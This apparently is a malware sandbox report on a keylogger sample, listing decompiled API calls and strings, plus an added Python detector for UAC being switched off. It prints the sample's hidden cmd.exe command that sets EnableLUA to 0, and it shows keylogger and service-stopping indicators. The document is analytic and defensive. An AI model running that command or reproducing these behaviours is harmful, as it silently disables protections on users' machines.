                                    0x105c6866
                                    0x105c6869
                                    0x105c686c
                                    0x105c686e
                                    0x00000000
                                    0x00000000
                                    0x105c6873
                                    0x105c687a
                                    0x105c687d
                                    0x105c6883
                                    0x105c6886
                                    0x00000000
                                    0x105c682a
                                    0x105c682a
                                    0x105c6830
                                    0x105c6830
                                    0x105c6837
                                    0x105c6838
                                    0x105c683b
                                    0x105c683b
                                    0x105c683b
                                    0x105c683e
                                    0x105c6841
                                    0x105c6841
                                    0x105c6841
                                    0x105c6841
                                    0x105c6844
                                    0x105c6844
                                    0x00000000
                                    0x105c6844
                                    0x105c682c
                                    0x105c682e
                                    0x105c684b
                                    0x105c684d
                                    0x00000000
                                    0x00000000
                                    0x105c684f
                                    0x00000000
                                    0x00000000
                                    0x105c6851
                                    0x105c6853
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x105c6853
                                    0x00000000
                                    0x105c682e
                                    0x105c6828
                                    0x105c6771
                                    0x105c6772
                                    0x105c6778
                                    0x105c677a
                                    0x00000000
                                    0x00000000
                                    0x105c677f
                                    0x105c6782
                                    0x00000000
                                    0x105c6782
                                    0x105c66d4
                                    0x105c66de
                                    0x105c66e0
                                    0x105c66e1
                                    0x105c66e3
                                    0x00000000
                                    0x00000000
                                    0x105c66e5
                                    0x105c66ef
                                    0x105c66f2
                                    0x105c66f8
                                    0x105c66f9
                                    0x105c66fb
                                    0x105c66fe
                                    0x105c66ff
                                    0x105c6702
                                    0x105c6709
                                    0x105c670b
                                    0x00000000
                                    0x00000000
                                    0x105c6711
                                    0x105c6714
                                    0x00000000
                                    0x00000000
                                    0x105c671a
                                    0x105c671b
                                    0x105c6721
                                    0x105c6723
                                    0x00000000
                                    0x00000000
                                    0x105c672c
                                    0x105c672d
                                    0x105c6733
                                    0x105c6734
                                    0x105c6737
                                    0x105c6738
                                    0x105c673f
                                    0x105c6741
                                    0x00000000
                                    0x00000000
                                    0x105c6747
                                    0x00000000
                                    0x105c6747
                                    0x105c66e7
                                    0x105c66ed
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x105c66ed
                                    0x105c66d6
                                    0x105c66dc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x105c66dc
                                    0x105c66c5
                                    0x105c66b3
                                    0x105c688b
                                    0x105c688c
                                    0x105c688d
                                    0x105c688e
                                    0x105c688f
                                    0x105c6890
                                    0x105c6895
                                    0x105c689b
                                    0x105c689c
                                    0x105c68a1
                                    0x105c68a3
                                    0x105c68a5
                                    0x105c68a7
                                    0x105c68ab
                                    0x105c68b3
                                    0x105c68b8
                                    0x105c68b8
                                    0x00000000
                                    0x105c68b8
                                    0x105c68bc

                                    APIs
                                    • __allrem.LIBCMT ref: 105C6799
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C67B5
                                    • __allrem.LIBCMT ref: 105C67CC
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C67EA
                                    • __allrem.LIBCMT ref: 105C6801
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C681F
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 70e43babb6b80f0446183ccc8a4913d0ff470ccdc368e1151db7c4cb29152702
                                    • Instruction ID: d49cdd11bfac7b8b619479a999c2125c9e5a322f0e6642317b1bdba0728c6d14
                                    • Opcode Fuzzy Hash: 70e43babb6b80f0446183ccc8a4913d0ff470ccdc368e1151db7c4cb29152702
                                    • Instruction Fuzzy Hash: 7C81F776A007069BE7149BF8CD85B6ABBECEF88764F11453AF510D6680E774FB4087A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: 610f84934d2dab88b77d09307504a995a3c4a4e7c94a9deef8044fb604d26232
                                    • Instruction ID: 612f4ceb6315adc1c5b0885da8f5b7af76663847d647c03a4f2f89688181d6bb
                                    • Opcode Fuzzy Hash: 610f84934d2dab88b77d09307504a995a3c4a4e7c94a9deef8044fb604d26232
                                    • Instruction Fuzzy Hash: B151C336900209EBDB349B68CC46BAE77E9BF49330F64433AF914D66C2DB3DD9409664
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNEL32(00001388), ref: 006D8C8A
                                      • Part of subcall function 006D8BC0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,006D8C97), ref: 006D8BF6
                                      • Part of subcall function 006D8BC0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,006D8C97), ref: 006D8C05
                                      • Part of subcall function 006D8BC0: Sleep.KERNEL32(00002710,?,?,?,006D8C97), ref: 006D8C32
                                      • Part of subcall function 006D8BC0: CloseHandle.KERNEL32(00000000,?,?,?,006D8C97), ref: 006D8C39
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 006D8CC6
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 006D8CD7
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 006D8CEE
                                    • PathFileExistsW.SHLWAPI(00000000,00000012), ref: 006D8D69
                                      • Part of subcall function 006E79DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E79F9
                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0072F724), ref: 006D8E85
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                    • String ID:
                                    • API String ID: 3795512280-0
                                    • Opcode ID: 6e93a959fa088a6b48d19c3b97cea0430da1c427ceddad8c3707b24972bb8a08
                                    • Instruction ID: ce3a9ddf73c74e5b33c7d649c331dab051aa3b06d61dc6575a7b8b99593539ac
                                    • Opcode Fuzzy Hash: 6e93a959fa088a6b48d19c3b97cea0430da1c427ceddad8c3707b24972bb8a08
                                    • Instruction Fuzzy Hash: 04513071E082016BCB55FB70C8669BF77AB5F96300F04052FF9429B3D2DF689A05879A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16_free
                                    • String ID: a/p$am/pm
                                    • API String ID: 2936374016-3206640213
                                    • Opcode ID: 5f7bb65ef4c9aecda5c1ac43762c399bc485a2287e6855c50446ade03a2cdfe8
                                    • Instruction ID: 12ad27df29ec396f40817ad780552c59e5a5afccb9fee299d131a47ca180b109
                                    • Opcode Fuzzy Hash: 5f7bb65ef4c9aecda5c1ac43762c399bc485a2287e6855c50446ade03a2cdfe8
                                    • Instruction Fuzzy Hash: 14D1EE31A1025ADACB288F6CC8956FAB7B1FF05700FA44159EB11AF6C5D23D9DC1CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00705545,?,?,?,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711CE6
                                    • _free.LIBCMT ref: 00711D19
                                    • _free.LIBCMT ref: 00711D41
                                    • SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D4E
                                    • SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D5A
                                    • _abort.LIBCMT ref: 00711D60
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: aa6c2f52d4e69ef023ad8804beaa1a33fa8c2aed141a8f0eda269a75862f806d
                                    • Instruction ID: 7e47d5945be1cb415e4a3dc9d6ab96a8249c8e9438da5eb060242d13bef4f060
                                    • Opcode Fuzzy Hash: aa6c2f52d4e69ef023ad8804beaa1a33fa8c2aed141a8f0eda269a75862f806d
                                    • Instruction Fuzzy Hash: 7EF08C3A340601E7D322237CBC0EEDE22799BD2761B654225F7589A1E2EE7C898241A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E641A
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E642E
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E643B
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E644A
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E645C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5FB6,00000000), ref: 006E645F
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 259977478fbf1b5431c95a41eb24ed11b1e617d6c4a37b741486acab46c162b8
                                    • Instruction ID: e9e577e2909a734b380da2dac0ec2b4e1d30cfef472eed2a850591061c269c4e
                                    • Opcode Fuzzy Hash: 259977478fbf1b5431c95a41eb24ed11b1e617d6c4a37b741486acab46c162b8
                                    • Instruction Fuzzy Hash: B4F0C2316412187BD230AB65AC49DBF3BAEDB45690B004016FD0586141EE6C8E0696B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E6585
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E6599
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E65A6
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E65B5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E65C7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5EB6,00000000), ref: 006E65CA
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 0a2a29b0af36edb14035973d20e222ca4910a5a43a4588b88d9adeea8adfc6bd
                                    • Instruction ID: c83dced0227ce83341327c88e86616e5a78fc25c626305df571631dac934dd2b
                                    • Opcode Fuzzy Hash: 0a2a29b0af36edb14035973d20e222ca4910a5a43a4588b88d9adeea8adfc6bd
                                    • Instruction Fuzzy Hash: A9F0F6316412187BD230AB65EC49EBF3B6EDB45290F00401AFE0996141EF7C8F069AF8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _strncpy
                                    • String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
                                    • API String ID: 2961919466-1012175531
                                    • Opcode ID: e3cf5d9f82e42301d7ceb7935bcd58d37448f6b9ab2d364eccda954a63fa7032
                                    • Instruction ID: 00876d654f95d7bef4a5de3b8d4e687bf6760322d0bb247283228c4042073bb5
                                    • Opcode Fuzzy Hash: e3cf5d9f82e42301d7ceb7935bcd58d37448f6b9ab2d364eccda954a63fa7032
                                    • Instruction Fuzzy Hash: F8515735D06389DBDF20CEA58885BFFBBB69F40340F185569D940A7386E3758D02CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateThread.KERNEL32 ref: 006D87CA
                                    • CreateThread.KERNEL32 ref: 006D87DA
                                    • CreateThread.KERNEL32 ref: 006D87E6
                                      • Part of subcall function 006D9634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0073C350), ref: 006D9642
                                      • Part of subcall function 006D9634: wsprintfW.USER32 ref: 006D96C3
                                      • Part of subcall function 006D9634: SetEvent.KERNEL32(00000000,00000000), ref: 006D96ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$EventLocalTimewsprintf
                                    • String ID: Offline Keylogger Started$[Info]
                                    • API String ID: 3534694722-3531117058
                                    • Opcode ID: a09dcc1baacbd33252152e0cd4827696e48895c8cbc1a35bd2bcb75b6bd6a3c8
                                    • Instruction ID: 0f0a05e3cf296f1a2e3f6b85a996b5b213a4749b4b2bdd828bba83f083a6a1e0
                                    • Opcode Fuzzy Hash: a09dcc1baacbd33252152e0cd4827696e48895c8cbc1a35bd2bcb75b6bd6a3c8
                                    • Instruction Fuzzy Hash: AF11E7A19002087ED210B6799C8ACBF7A5EDA92394B40052EF94553392DD645E04C6FA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006D9634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0073C350), ref: 006D9642
                                      • Part of subcall function 006D9634: wsprintfW.USER32 ref: 006D96C3
                                      • Part of subcall function 006D9634: SetEvent.KERNEL32(00000000,00000000), ref: 006D96ED
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                    • CreateThread.KERNEL32 ref: 006D942D
                                    • CreateThread.KERNEL32 ref: 006D9439
                                    • CreateThread.KERNEL32 ref: 006D9445
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTime$Eventwsprintf
                                    • String ID: Online Keylogger Started$[Info]
                                    • API String ID: 3546759147-3401407043
                                    • Opcode ID: 1b6b687c1e1fa9a087bfb916ed99e38717a90b5dd4ccbc1a61fb7f217ad0bd57
                                    • Instruction ID: 19aac5d06dd3bedafa6d152f44372eaf5f126b7c1060d85e5ec6e6b084cb4e8b
                                    • Opcode Fuzzy Hash: 1b6b687c1e1fa9a087bfb916ed99e38717a90b5dd4ccbc1a61fb7f217ad0bd57
                                    • Instruction Fuzzy Hash: 7A01D6A1F012593EE62076758C9BDBF7A6FCA96794F80006EFA8113343DD641C0683F6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ClassCreateErrorLastRegisterWindow
                                    • String ID: 0$MsgWindowClass
                                    • API String ID: 2877667751-2410386613
                                    • Opcode ID: 30ffbd1023df8ef96a049aba0a7e3e21d49cd07b5980c83a20cb0c2ca479ad03
                                    • Instruction ID: bb23fd438fc60a47d9daa357258d80d98ce5d2533b9046f48882a018981e7584
                                    • Opcode Fuzzy Hash: 30ffbd1023df8ef96a049aba0a7e3e21d49cd07b5980c83a20cb0c2ca479ad03
                                    • Instruction Fuzzy Hash: A00125B190131DAFDB10DF95AC849EFBBBDFB04794F40452AF904A6240EB785A058BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00702D28
                                      • Part of subcall function 00703360: ___AdjustPointer.LIBCMT ref: 007033AA
                                    • _UnwindNestedFrames.LIBCMT ref: 00702D3F
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00702D51
                                    • CallCatchBlock.LIBVCRUNTIME ref: 00702D75
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    • String ID: =1p
                                    • API String ID: 2633735394-1168824671
                                    • Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                                    • Instruction ID: 656db4ba54e21a388a2a8e138c9200a51e1f1abbd462a49846bec7e061fbc890
                                    • Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                                    • Instruction Fuzzy Hash: FF012932100109FBCF125F95CC09EDA3BBAFF48714F058614FA1862162C73AE862EBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,006DC5FB,00000000,0073C578,00000001), ref: 006DD43B
                                    • CloseHandle.KERNEL32(006DC5FB), ref: 006DD44A
                                    • CloseHandle.KERNEL32(00000027), ref: 006DD44F
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 006DD431
                                    • C:\Windows\System32\cmd.exe, xrefs: 006DD436
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    • Opcode ID: a0e91a64d87f323cffa164b9ce2d14d1ad123cb33f14125693cc62a290d984f9
                                    • Instruction ID: a6e3fc030fe5da2d48a380b3c129aad8ced7c96cc4b44f096f8a9678b16b339f
                                    • Opcode Fuzzy Hash: a0e91a64d87f323cffa164b9ce2d14d1ad123cb33f14125693cc62a290d984f9
                                    • Instruction Fuzzy Hash: B3F062B290011CBEEB105AE9DC85EEFBB6CEB44795F000422F604E2014D5345D148AA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%
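
                                    The function above spawns cmd.exe with `/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f`, passing 0x08000000 (CREATE_NO_WINDOW) as dwCreationFlags. Writing EnableLUA = 0 switches UAC off from the next reboot, and /k keeps the shell alive after reg.exe has exited. Two details matter for a detection: cmd.exe is supplied as lpApplicationName, so the child's recorded command line begins with `/k` rather than with cmd.exe, and the same write can be spelled with HKEY_LOCAL_MACHINE, a trailing backslash, a lower-case value name or `/d 0x0`. The detector below is an added example, not code from the sample or from this report; it runs over constructed process-creation records, and the (image, command line) record shape is an assumption about the telemetry source. Its `/c` handling also covers a shell started through ShellExecuteW("open", "cmd.exe", "/C ...") as in a later function of this report.

```python
"""Detect UAC being switched off through EnableLUA=0 in process-creation telemetry.

Added example for this report, not code from the sample or the sandbox. The
event records below are constructed; the (image, command_line) shape is an
assumption about the telemetry feed.
"""
import re

# Windows-style tokenizer: a double-quoted run is one argument, quotes removed.
_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
# Image tests: bare name, name.exe, or a path ending in either.
_CMD_EXE = re.compile(r'(^|[\\/])cmd(\.exe)?$', re.I)
_REG_EXE = re.compile(r'(^|[\\/])reg(\.exe)?$', re.I)
# The UAC policy key in either hive spelling, with or without a trailing backslash.
_POLICY_KEY = re.compile(
    r'^(HKLM|HKEY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
    r'\\Policies\\System\\?$', re.I)


def win_argv(cmdline):
    """Split a Windows command line into arguments (quotes stripped)."""
    return [quoted or bare for quoted, bare in _TOKEN_RE.findall(cmdline)]


def unwrap_cmd(argv):
    """Peel off cmd.exe /c and /k wrappers, repeatedly.

    Also accepts a command line that starts with the switch itself: when
    CreateProcess gets cmd.exe as lpApplicationName and "/k ..." as
    lpCommandLine, as in this sample, "/k ..." is what the child records.
    """
    while argv:
        i = 1 if _CMD_EXE.search(argv[0]) else 0
        # skip other cmd switches (/q, /d, ...) that may precede /c or /k
        while i < len(argv) and argv[i].startswith('/') and argv[i].lower() not in ('/c', '/k'):
            i += 1
        if i < len(argv) and argv[i].lower() in ('/c', '/k'):
            rest = argv[i + 1:]
            if len(rest) == 1 and ' ' in rest[0]:       # inner command quoted as one token
                rest = win_argv(rest[0])
            argv = rest
            continue
        return argv
    return argv


def _parse_dword(text):
    """reg.exe accepts decimal and 0x-prefixed hex for /d; return int or None."""
    if text is None:
        return None
    for base in (0, 10):
        try:
            return int(text, base)
        except ValueError:
            pass
    return None


def is_enablelua_disable(cmdline):
    """True if cmdline writes EnableLUA=0 under the UAC policy key via reg add."""
    argv = unwrap_cmd(win_argv(cmdline))
    if len(argv) < 3 or not _REG_EXE.search(argv[0]) or argv[1].lower() != 'add':
        return False
    if not _POLICY_KEY.match(argv[2]):
        return False
    opts = {}
    i = 3
    while i < len(argv):                                # /v name /t type /d data, any order
        if argv[i].lower() in ('/v', '/t', '/d') and i + 1 < len(argv):
            opts[argv[i].lower()] = argv[i + 1]
            i += 2
        else:
            i += 1
    return opts.get('/v', '').lower() == 'enablelua' and _parse_dword(opts.get('/d')) == 0


# Constructed records modelled on the CreateProcessA call above. The first entry
# is lpCommandLine as the child records it (cmd.exe went in lpApplicationName).
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\cmd.exe",
     "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"
     "\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f"),
    ("C:\\Windows\\System32\\reg.exe",
     'reg add "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"'
     ' /v enablelua /d 0x0 /f'),
    ("C:\\Windows\\System32\\reg.exe",
     "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"
     " /v EnableLUA /t REG_DWORD /d 1 /f"),
    ("C:\\Windows\\System32\\cmd.exe", "cmd.exe /c dir"),
]


def scan(events):
    """Return the command lines that disable UAC."""
    return [cmd for _image, cmd in events if is_enablelua_disable(cmd)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("EnableLUA=0 write:", hit)
```

                                    Matching on parsed arguments rather than on a substring keeps the rule insensitive to hive spelling, value-name case and the decimal/hex form of the data, while still requiring the exact policy key, so an unrelated `reg add` with `/d 0` does not fire.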

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,006D5196), ref: 006D51B1
                                    • CloseHandle.KERNEL32(?), ref: 006D5207
                                    • SetEvent.KERNEL32(?), ref: 006D5216
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection timeout$[WARNING]
                                    • API String ID: 2055531096-1470507543
                                    • Opcode ID: 0b959738b2e4896bd18429e1d1fd7638438885df53a25ca9baa0959704873c96
                                    • Instruction ID: 7800380074f8739bc4b1edf82151e63269d741fe8162c1d229d2e04717e70169
                                    • Opcode Fuzzy Hash: 0b959738b2e4896bd18429e1d1fd7638438885df53a25ca9baa0959704873c96
                                    • Instruction Fuzzy Hash: D001F231E01B80AFC731BF7A9C5646AFBE2FF05305300882EE0C382B21CB689904CB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 006E271D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: /C $8Em$cmd.exe$open
                                    • API String ID: 587946157-1289838226
                                    • Opcode ID: 59dfd568f2828459e5fd86dc3f501558ca451df23e3139f8986915ccffdff4ce
                                    • Instruction ID: c6d7dd9cc4da551e1d2910253cba16c3391e25e3b7d3f316c55e146d77185976
                                    • Opcode Fuzzy Hash: 59dfd568f2828459e5fd86dc3f501558ca451df23e3139f8986915ccffdff4ce
                                    • Instruction Fuzzy Hash: 91F0E671A083406BD254FBB1D8959BFB3EBAB95300F00092FB5568A292EF745E09C659
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006DB836
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 006DB875
                                      • Part of subcall function 007003A0: _Yarn.LIBCPMT ref: 007003BF
                                      • Part of subcall function 007003A0: _Yarn.LIBCPMT ref: 007003E3
                                    • std::bad_exception::bad_exception.LIBCMT ref: 006DB88D
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006DB89B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                    • String ID: bad locale name
                                    • API String ID: 3706160523-1405518554
                                    • Opcode ID: bd47caf3aaec375782b6ce2fc00a22dadb51e58196721f8f04f3817f8c2df098
                                    • Instruction ID: fd9f530e5230abda0a4750aa4a5f07aeb1b47899d3f0f716723d3360f86d1d68
                                    • Opcode Fuzzy Hash: bd47caf3aaec375782b6ce2fc00a22dadb51e58196721f8f04f3817f8c2df098
                                    • Instruction Fuzzy Hash: 41F03131900208EBD368FA60ED57EDA73E5AF10760F50463EF545125D2AF78B909C689
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0070CB84,0000000C,?,0070CB24,0000000C,00738188), ref: 0070CBAF
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0070CBC2
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0070CB84,0000000C,?,0070CB24,0000000C,00738188), ref: 0070CBE5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: ab3ab0b2ec777f5cb57673f9b694a32d594a9a8233eecb7a9ae4cb4c2d78c461
                                    • Instruction ID: 75dece3523fea1d053f1b6319c6265e4fceb0bff6c8b86452956c5d923ebc244
